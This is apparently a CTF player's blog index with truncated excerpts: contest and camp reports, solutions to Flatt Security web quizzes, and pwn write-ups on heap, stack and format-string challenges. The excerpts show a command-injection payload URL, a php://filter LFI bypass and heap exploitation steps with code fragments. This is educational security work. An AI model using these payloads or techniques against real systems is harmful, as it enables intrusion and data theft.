Here I mainly write CTF writeups (binary exploitation / pwn and the like) and things I have learned. If you want to see in English, you can click on the En button in the upper left corner.
RicercaCTF2023 writeup
Introduction
I took part in RicercaCTF 2023, held on 4/22, as SUSH1st1 and finished 23rd. It was frustrating that I could not solve much of Pwn and Web.
Problems solved during the competition: [pwn 97] BOFSec (107 solves), [web 95] Cat Café (113 solves), [misc 200] gatekeeper (21 solves)
Problems solved after the competition: [web] tinyDB
Problems solved during the competition
[pwn 97] BOFSec
"100% genuine guarantee", authored by ptr-yudai
Challenge overview: whether or not you get the flag depends on the user's is_admin ...
// (partial excerpt)
typedef struct { char name[0x100]; int is_admin; } auth_t;
auth_t get_auth(void) { auth_t user = { .is_admin = 0 }; printf("Name: "); scanf("%s", user.name); return user; }
int main() { char flag[0x100] = {}; auth_t user = get_auth(); if (user....
GCC 2023 in Singapore participation report
Introduction
From 02/12 to 02/18 I attended Global Cyber Camp in Singapore. In this post I write about everything from the application stage to what happened during the camp and my impressions. There were many things I noticed and experienced, so please read to the end. Also, English version is here, please check it out!
When I applied
Around November 2022, something called Global Cyber Camp (GCC below) appeared on my Twitter timeline. I wanted to take part, but there was an application assignment, so I kept putting the application off. At some point I remembered GCC and wondered "when was the GCC application deadline again?"; when I checked, it was two days away. I worked through the assignment I had been putting off and applied.
At Global Cyber Camp
What we did
I will briefly write about a few lectures that left an impression on me.
In the first half of the hackathon "PowerShell malware detection engine by participants", we learned the basics of PowerShell malware. I had never had a chance to use PowerShell before, and through a simulator called ShinoBOT I realised how much it can do. In this lecture we had to build a detection engine as a group, but with a different language the discussion did not go as it usually would, and I found that frustrating.
The lecture "Drone security and signal analysis" left a strong impression on me. In the first half we watched drones flying all over the room and then being rendered uncontrollable by a certain piece of equipment. In the second half we built small drones. There were many drones in the room and, perhaps because of interference, mine would not fly easily, but I was very happy when it did.
We also did an introduction to web penetration testing, reverse engineering of C++ malware with IDA, and more. You can check which lectures there were here; some lectures were changed.
Various events and things I noticed
At lunch break someone would always strike up a conversation, and except for the day we built the PowerShell malware detection engine, I went out with someone every evening.
Pronunciation-Battle
One day Singaporeans, Malaysians, Taiwanese, Koreans and Japanese ended up drinking at a place like a street-food-stall area. I had heard in Japan about playing games and doing chants at drinking parties, and it seems other countries have a similar culture. One such game was the Pronunciation-Battle. The rules: a word from your own country is passed around the table, and whoever cannot pronounce it correctly loses a life. It is a five-life system...
KOSEN Security Contest 2022 participation report
Introduction
On 19 November 2022 I took part in the KOSEN Security Contest, held for the first time in a year. Note that this contest forbids mentioning the content of the problems or their solutions outside, so please understand in advance that this post is written so as to avoid referring to the problems.1
Preparation
We took part as SUSH1st (pronounced "sushi first") with four people: @yu1hpa, @Yajirushi, @Shibaken and Tofu-san. The team was the usual members plus one.
Competition day
On the day I woke up to my phone ringing. I nearly failed at the wake-up stage, but I made it in time. Pwn was not difficult, and especially in the morning I kept thinking "why has nobody solved these?". Given that, it was a pity to miss a full clear because of a mistake. I also left mainly the network problems to Tofu-san and had them solve those.
"I put off studying for exams to take part in the KOSEN Security Contest, but I could not solve any of the crypto problems, which is sad" — shiba (@Shibak33333333n) November 19, 2022
In this contest it hurt that there were few problems in Shibaken's field and that Yajirushi could not show their strength. We go to school together, so I know their abilities well. I wish it could have gone a little better, but it cannot be helped. Still, the moments when the four of us gathered and solved problems together were very exciting, and it was really fun!
Results
"Thanks everyone for the KOSEN Security Contest! We came 2nd, which is very frustrating. ... w/ @Shibak33333333n, @Yajirushi_314, Tofu-san" — yu1hpa (@yu1hpa) November 20, 2022
We fell one step short of 1st place and finished 2nd.
Finally
To everyone in charge of problem setting and operations: thank you for the flexible handling and for running the contest smoothly on the day!
This post is the day 3 article of Nagano KOSEN AdC 2022.
1. I asked the organisers, and impressions and problem names are fine. ↩︎
Flatt Security Developer's Quiz #2
https://twitter.com/flatt_security/status/1549710781918617600
Approach
Chain the output with pipes and display the file names.
Filtering and command execution
The following exec() filters on the pattern enclosed in slashes, so most symbols cannot be used.
if(/[!@#$%\^&*()\-_+=\[\] {}'";:,:?~\\]/.exec(ip_address)){ res.send("Error! Your request is filtered!"); return; }
We can see that a command entered in ip_address that evades the filter gets executed. Also, in the execSync() handling, the response is returned in the error case.
const cmd = "sh -c 'ping -c 1 " + ip_address + "' 2>&1 >/dev/null; true"; const stderr = execSync(cmd, {"timeout": 1000}); if(stderr != ""){ res.send("Error! " + stderr); return; } res.send("Your IP is in a good state!");
Answer
I noticed that the pipe | is not filtered, so I use it to chain commands.
https://2207okapi.twitter-quiz.flatt.training/?ip=0|ls|sh
Error! sh: 1: main.js: not found sh: 2: node_modules: not found sh: 3: package-lock....
Flatt Security Developer's Quiz #1
https://twitter.com/flatt_security/status/1529416984785752065
Approach
The JSON specification expands Unicode escape sequences, so I use that to bypass the filtering. Then I use php://filter/convert.base64-encode to perform a Local File Inclusion (LFI).
file_get_contents("php://input")
The php://input below reads raw data from the request body, and file_get_contents() reads the contents of a file into a string.
$query = file_get_contents("php://input");
Considering how to bypass the filtering
The strings filtered by the following $filter_list are contained in what PHP calls wrappers. I bypass this filter using JSON Unicode escapes. Also, because stripos() is used as shown below, the filter cannot be bypassed with upper-case letters.
stripos — Find the position of the first occurrence of a case-insensitive substring in a string
foreach ($filter_list as $filter) { if(stripos($query, $filter) !== false) { exit("Filtered!"); } }
Considering the LFI
The json_decode($query, true)['fn'] part below expects JSON of the form {"fn": "hoge"}. The solution to this quiz is to give a PHP supported protocol/wrapper such as php://... in the "hoge" part and perform an LFI.
$output = file_get_contents(json_decode($query, true)['fn']);
Also, if the file read via the LFI contains the string <?php, the script exits, so I use php://filter/convert.base64-encode to output a base64-encoded string.
Bypassing the filtering and the LFI
Referring to "Using php://filter for local file inclusion", I consider a URL like the following.
php://filter/convert.base64-encode/resource=index.php
This URL contains filtered characters, so I replace them with Unicode escapes....
babyheap - FireShellCTF 2019
Approach
Overwrite fd via the Use After Free to link .bss+0x20 (the address of the global variables) into tcache. At that point, reinitialise all of the global variables. Then point atoi@got at system and call system("/bin/sh").
Use After Free
Overwrite the fd of the freed region with .bss+0x20. (The region freed first is written as 0.)
tcache: 0 -> (.bss+0x20) -> NULL
create() delete() edit(p64(e.bss()+0x20)) # 0x6020a0
Why link to the address .bss+0x20
The various flags and the region returned by malloc are placed in .bss. So the reason is that we want to reinitialise the flags and write an arbitrary address into the returned region.
Address of the .bss section
gef➤ xfiles
Start End Name File
0x00000000003ff270 0x00000000003ff450 .dynamic /ctf/yu1hpa/019/FireShell/babyheap/babyheap
: : :
0x0000000000602080 0x00000000006020d0 .bss /ctf/yu1hpa/2019/FireShell/babyheap/babyheap
Hence the bss section starts at 0x602080.
Technique for reinitialising the flags and leaking libc
The technique is to do create -> edit -> show -> delete. Because delete was done last and the hidden command fill has not been used, the flags are set. (With a decompiler you can check which flag each address is.)
0x6020a0: 0x0000000000000000 0x0000000000000001
0x6020b0: 0x0000000000000001 0x0000000000000001
0x6020c0: 0x0000000000000000 0x0000000000603260
0x6020a0: create, 0x6020a8: edit, 0x6020b0: show, 0x6020b8: delete, 0x6020c0: fill, 0x6020c8: the region returned by malloc
After that, with fill....
heap_challenge - CPCTF 2022
Approach
libc leak via the unsorted bin, and House of botcake.
Preparation
# def new(index: str, msg: str, content: bytes)
new("0", "16", b"AAAA") new("1", "1280", b"BBBB") new("2", "16", b"CCCC") new("3", "16", b"DDDD") new("4", "16", b"EEEE") new("5", "16", b"FFFF")
Technique for the libc leak via the unsorted bin
The fd of the unsorted bin points at main_arena.top. If we know the position of the top member and the position of main_arena inside libc, we can compute the libc base address. (top does not hold an address until malloc has been called once, so advance to that point.)
gef➤ heap arena
Arena (base=0x7ffff7fc1b80, top=0x55555555b2d0, last_remainder=0x0, next=0x7ffff7fc1b80, next_free=0x0, system_mem=0x21000)
Next, libc is mapped at 0x00007ffff7dd5000.
gef➤ vm
: 0x00007ffff7dd5000 0x00007ffff7df7000 0x0000000000000000 r-- /ctf/yu1hpa/2022/CPCTF/heap_chal/libc.so.6
Therefore the offset to main_arena is 0x7ffff7fc1b80 - 0x00007ffff7dd5000 = 0x1ecb80.
The position of the top member can be checked as follows.
gef➤ x/16xg 0x7ffff7fc1b80
0x7ffff7fc1b80: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1b90: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1ba0: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1bb0: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1bc0: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1bd0: 0x0000000000000000 0x0000000000000000
0x7ffff7fc1be0: 0x000055555555b2d0 0x0000000000000000
0x7ffff7fc1bf0: 0x00007ffff7fc1be0 0x00007ffff7fc1be0
Since top=0x55555555b2d0 sits at main_arena(0x7ffff7fc1b80)<+96>, the libc base address is obtained as follows....
fastbin_tutorial - InterKosenCTF2019
Approach
The official writeup does it with a Use After Free, but since the program prints "Double Free Tutorial!", I do a double free and a fastbin unlink attack.
Caveat
0x10 must be subtracted from the flag address given at the start.
char *flag;
:
void setup(void) { setbuf(stdin, NULL); setbuf(stdout, NULL); setbuf(stderr, NULL); FILE *f = fopen("flag.txt", "r"); flag = malloc(0x50); if (f == NULL) { puts("[WARN] Please report this bug to the author."); exit(1); } fread(flag, 1, 0x50, f); fclose(f); malloc(0x100); // assure no leak by freed FILE buffer }
If you link the given address directly, the program tells you "Oops! You forgot the overhead...?". Because flag was allocated with malloc, the address returned is the real chunk +0x10. malloc.c L1126
Linking addr_flag into the fastbin
Create a shared state on a chunk so that when that chunk is returned, addr_flag is returned....
shopkeeper - InterKosenCTF2019
Approach
Overwrite the variable money inside the shop function via a stack overflow, obtain enough money and buy Hopes.
Finding the vulnerabilities
One vulnerability is that the readline function accepts unlimited input.
void readline(char *buf) { char *ptr; for(ptr = buf; ; ++ptr) { // Vulnerable here if (read(0, ptr, 1) == 0) break; if (*ptr == '\n') { *ptr = 0x00; break; } } }
The other is that the strcmp function is used for string comparison.
void shop(item_t *inventory) { char buf[LEN_NAME]; item_t *p, *t; int money = 100;
First, since money is defined as a local variable inside the shop function, I look for a place where it can be overwritten.
strcmp does not compare past '\0'
The purchase function, called from within shop, used strcmp for string comparison. The manual says the following.
strncmp() is designed for comparing strings rather than binary data, characters that appear after a `\0' character are not compared....
uma_catch - SECCON Beginners CTF 2021
uma_catch - SECCON BeginnersCTF2021 (My solver)
Approach
Leak an address inside libc via a Format String Bug, then get a shell with tcache poisoning.
libc leak via the FSB
In the show function at line 197 of src.c, no format specifier is used, which causes an FSB.
void show() { printf(list[get_index()]->name); }
Technique for finding an address inside __libc_start_main
Next, look up the address of __libc_start_main. It can be found as follows.
gef➤ disass __libc_start_main
Dump of assembler code for function __libc_start_main:
0x00007ffff7a03b10 <+0>: push r13
0x00007ffff7a03b12 <+2>: push r12
(omitted)
0x00007ffff7a03bf0 <+224>: mov rax,QWORD PTR [rsp+0x18]
0x00007ffff7a03bf5 <+229>: call rax
0x00007ffff7a03bf7 <+231>: mov edi,eax
0x00007ffff7a03bf9 <+233>: call 0x7ffff7a25240 <exit>
0x00007ffff7a03bfe <+238>: mov rax,QWORD PTR [rip+0x3ceda3] # 0x7ffff7dd29a8
(omitted)
0x00007ffff7a03cc3 <+435>: call QWORD PTR [rdx+0x168]
0x00007ffff7a03cc9 <+441>: jmp 0x7ffff7a03ba5 <__libc_start_main+149>
End of assembler dump....